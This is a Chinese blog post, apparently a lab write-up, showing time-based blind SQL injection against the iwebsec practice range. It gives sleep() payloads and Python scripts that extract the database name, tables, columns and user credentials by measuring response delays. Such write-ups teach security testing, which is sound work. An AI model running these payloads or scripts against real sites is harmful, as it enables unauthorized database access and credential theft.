SQL注入漏洞 | sleep型

最新推荐文章于 2024-05-03 12:26:24 发布
最新推荐文章于 2024-05-03 12:26:24 发布
阅读量1.3k 收藏 5
点赞数
分类专栏: web安全 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/128209013
版权

文章目录

前言

  • SQL注入漏洞 | bool型

  • if(SQL语句,sleep(),null)
    在这里插入图片描述

  • if()、sleep()的使用

    select * from table where id=1 and sleep(2)  
//执行查询id=1,同时sleep(2)。浏览器显示数据库返回的结果时有较长的时间延迟

select * from table where id=1 and if(1,sleep(2),0)  
//执行查询id=1,同时因为if的条件为1,所以执行sleep(2),返回结果有时间延迟

select * from table where id=1 and if(0,sleep(2),0)  
//执行查询id=1,同时因为if的条件为0,所以执行0,返回结果没有时间延迟

  • 总结:一边用靶场复现,一边写复现文章,前后用了3小时,写一篇文章真的耗时间。

MySQL sleep型

测试

  1. 好久没用了,需要重新启动靶场
    在这里插入图片描述

  2. 随便测试一下,发现不会把查询结果返回,而且无论错对,返回的东西都一样,因此也无法利用bool型注入
    在这里插入图片描述
    在这里插入图片描述

  3. 使用一下sleep()函数,观察是否有时间延迟
    在这里插入图片描述

    在这里插入图片描述

  4. 有时间延迟,说明sleep(2)放进数据库执行了,导致返回结果延迟,因此这里有SQL注入点。
    在这里插入图片描述

  5. 因此我们可以利用是否有时间延迟来判断if的条件是否为真。

数据库名长度

  1. ?id=1 and if(length(database())=1,sleep(4),0),我们可以一个一个猜测,假设length(database())=1,观察有没有时间延迟,没有的话说明我们猜错了,继续猜。猜到7的时候,观察到时间延迟了,说明我们猜对了。
    length(database())=3

  2. 重复的工作可以用脚本,顺便锻炼一下写exp的能力。

    import time
import requests

url = "http://8.134.148.36:8001/sqli/04.php"

def DBlen():
    for i in range(20):
        payload = url + "?id=1 and if(length(database())={},sleep(4),0)".format(i)
        start_time = time.time()  # 记录开始时间
        response = requests.get(url=payload)
        space_time = time.time() - start_time  # 时间间隔
        if space_time >= 4:
            print("数据名长度为", i)
            return i

    在这里插入图片描述

数据库名

  1. 现在知道了数据库名的长度,下一步可以猜测数据库名。一位一位的猜测,猜测database的第一位为a,转换成ASCII码为97ord(mid((select database()),1,1))=97
    在这里插入图片描述

  2. 脚本

    def DBname():
    result = ""
    for i in range(20):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and if(ord(mid((select database()),{},1))>{},sleep(2),0)".format(i, mid)
            start_time = time.time()  # 记录开始时间
            response = requests.get(url=payload)
            space_time = time.time() - start_time  # 时间间隔
            if space_time >= 2:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名为", result)

  3. sleep(4)太久了,我改成sleep(2),减少一下时间,整个过程有点久,多点的耐心。
    在这里插入图片描述

表名

  1. 下一步,就是找数据库iwebsec下的所有表。这是查询表名
    ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=95

  2. 脚本

    def DBtable():
    result = ""
    for i in range(30):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and if(ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0)".format(
                i, mid)
            start_time = time.time()  # 记录开始时间
            response = requests.get(url=payload)
            space_time = time.time() - start_time  # 时间间隔
            if space_time >= 2:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名的表名为", result)

    在这里插入图片描述

列名

  1. 上面已经知道了数据库有哪些表,现在测一下某个表下有哪些列(字段)。以user表为例子:

    def DBcolumn():
    result = ""
    for i in range(30):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and if(ord(mid((select group_concat(column_name) from information_schema.columns where table_name='user'),{},1))>{},sleep(2),0)".format(
                i, mid)
            start_time = time.time()  # 记录开始时间
            response = requests.get(url=payload)
            space_time = time.time() - start_time  # 时间间隔
            if space_time >= 2:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名的表的列为", result)

  2. 结果
    在这里插入图片描述

字段值

  1. 上面我们知道了user表有3个字段,分别为idusernamepassword,现在我们猜测一下这三个字段分别都有哪些值。

    def Getdata():
    result = ""
    for i in range(100):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and if(ord(mid((select group_concat(id,'--',username,'--',password,'--') from user),{},1))>{},sleep(2),0)".format(
                i, mid)
            start_time = time.time()  # 记录开始时间
            response = requests.get(url=payload)
            space_time = time.time() - start_time  # 时间间隔
            if space_time >= 2:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名的表的列为", result)

  2. 结果
    在这里插入图片描述

总脚本文件

https://pan.baidu.com/s/1ct7E8YKbaI8YksXVhHG7ig?pwd=qtog
c4fx
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞全接触.ppt
11-15
SQL注入漏洞全接触.ppt
mysql时间 注入 sleep_SQL注入进阶
weixin_29442195的博客
01-28 1011
原标题:SQL注入进阶 1、时间注入攻击时间注入攻击的测试地址:http://ccctf.cn/sql/time/time.php?id=1。访问该网址时,页面返回yes,在网址的后面加上一个单引号,再次访问,页面返回no。这个结果与Boolean注入非常相似,下面介绍遇到这种情况时的另外一种注入方法——时间盲注。它与Boolean注入的不同之处在于,时间注入是利用sleep或benchmark等...
php中sql注入漏洞示例 sql注入漏洞修复
10-26
主要介绍了php中sql注入漏洞示例,大家在开发中一定要注意
自己动手编写SQL注入漏洞扫描工具
12-31
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
SQL注入漏洞演示源代码
09-29
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
SQL注入sleep注入
weixin_43765321的博客
03-02 6673
1. MySQL中的sleep函数 在MySQL中执行select sleep(N)可以让此语句运行N秒钟,例如下图所示: Sleep函数的主要用途在于确定MySQL语句是否真正被执行了。比如下面语句执行时间为0.00秒,线程信息一闪而过,根本无从察觉。 这种情况下,我们通过在语句中添加一个sleep(N)函数,强制让语句停留1秒钟,来查看后台线程,例如下图所示: 但是你使用这个办法,是有前提的,它只能指定条件的记录存在时机会停止指定的秒数,比如咱们的库里并没有pig,查询条件设置为name= 'pi
sql注入-延时注入sleep()、benchmark()函数 延时注入
07-10 5876
【延时注入】结合if、case when 延时注入
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间盲注)
mooyuan的博客
11-26 1524
iwebsec靶场的SQL注入漏洞的第04关sleep注入漏洞渗透,iwebsec靶场的时间盲注由于没有任何过滤信息,与bool盲注一样为数字布尔盲注,故而使用sqlmap渗透十分方便高效。时间盲注相对而言十分耗时,手注或者半自动化注入相对而言操作过程较为麻烦,初学者还是应该以手动与半自动化注入结合方法练习,真正了解原理后可以在使用sqlmap来提升速度。
SQL注入-5】
qq_41889600的博客
11-01 233
SQl注入盲注
网络安全--SQL注入sleep注入
weixin_43774199的博客
09-24 3891
课程目标:说明MySQLsleep()、substr()、count()、length()等函数的用法,讲解盲注和ASCII码,组织实验使学生掌握sleep注入方式。 任务目标:学会MySQLsleep()、substr()、count()、length()等函数的用法,了解盲注和ASCII码,掌握sleep注入方式。 A.MySQL中的sleep函数 MySQL中的sleep函数 在MySQL中执行select sleep(N)可以让此语句运行N秒钟,例如下图所示: Sleep函数.
SQL注入漏洞过程实例及解决方案
09-08
主要介绍了SQL注入漏洞过程实例及解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
通达OA sql注入漏洞.zip
08-24
已实现漏洞验证脚本
SQL注入sleep()函数相关解决方案
一杯咖啡的渗透记忆
08-14 6630
最近做安全扫描的时候,经常遇到sleep()SQL注入,这个是request发送后会产生一个timeout的delay,没有respond。 跟我之前遇到的一般意思SQL注入不一样,之前的是SQL语句拼接产生的注入,会通过注入点抓到数据库。 这个相当于一种DDOS攻击,向数据库不停的发送request,不会很快释放连接,连接池会慢,导致数据库不响应。   解决方案:    在MY...
SQL怎么实现SLEEP功能(等待时间)
热门推荐
码农
01-20 1万+
来自:http://bbs.csdn.net/topics/60463451 WAITFOR DELAY/TIME  WAITFOR DELAY '时间' eg: 等待100豪秒: waitfor delay '00:00:00.100'
SQL注入sleep函数的一些小tips
TyRant的博客
03-24 986
sleep(duration) : 睡眠duration秒,返回0,若没有执行,则返回1 mysql> select * from users where id=1 and sleep(1); Empty set (1.00 sec) mysql> select * from users where id=1 or sleep(1); +----+----------+----------+ | id | username | password | +----+----------+-----
Sleep()函数失效的问题(WSL)
fangye945a的博客
07-06 3502
最近在指导新员工安装windows10 的Ubuntu子系统,写代码时发现其调用sleep函数无效,调用sleep直接返回,不会阻塞。 查询相关资料才知道,原来是windows10子系统 解决方法参考:https://blog.csdn.net/sinat_27953939/article/details/106473347?fps=1&locationNum=2 ...
sql注入(三)绕过方法及防御手段
m0_63306943的博客
05-02 7549
1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。rlike 模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来,用来取代 = 时,rlike 的用法和上面的 like 一样,没有通配符效果和 = 一样。因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,
SQL注入之路之四:时间注入
weixin_62715196的博客
08-11 730
时间注入又名延时注入,属于盲注的一种,通常是某个注入点无法通过布尔注入获取数据而采取的一种突破注入的技巧。在MySQL里函数sleep()是延时的意思,sleep(10)就是数据库延时10秒返回内容。判断注入可以使用’and sleep(10)意思是数据库延时10秒返回内容值(页面响应时间至少为10秒)MySQL延时注入用到的函数sleep()、if()、substring() select if(2>1,sleep(10),0)
SQL-索引篇整理
最新发布
m0_59925573的博客
05-03 1466
聚簇索引就是按照每张表的主键构造一颗B+树,同时叶子节点中存放的就是整张表的行记录数据,也将聚集索引的叶子节点称为数据页。索引需要额外的磁盘空间,并降低写操作的性能。3.使用短索引,如果对长字符串列进行索引,应该指定一个前缀长度,这样能够节省大量索引空间,如果搜索词超过索引前缀长度,则使用索引排除不匹配的行,然后检查其余行是否可能匹配。红黑树,1.每个节点都是红or黑 2.根节点是黑 3.每个叶子节点都是黑色 4.红色节点的父子节点都必须是黑的 5.从任一个节点到叶子节点的所有路径都包含相同的黑色结点。
SQL注入漏洞的常见手法
06-09
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者可以通过该漏洞访问或修改数据库中的数据。以下是SQL注入漏洞的常见手法: 1. 基于错误的SQL语句构造:攻击者可以在输入框中输入恶意代码,例如在输入框中输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值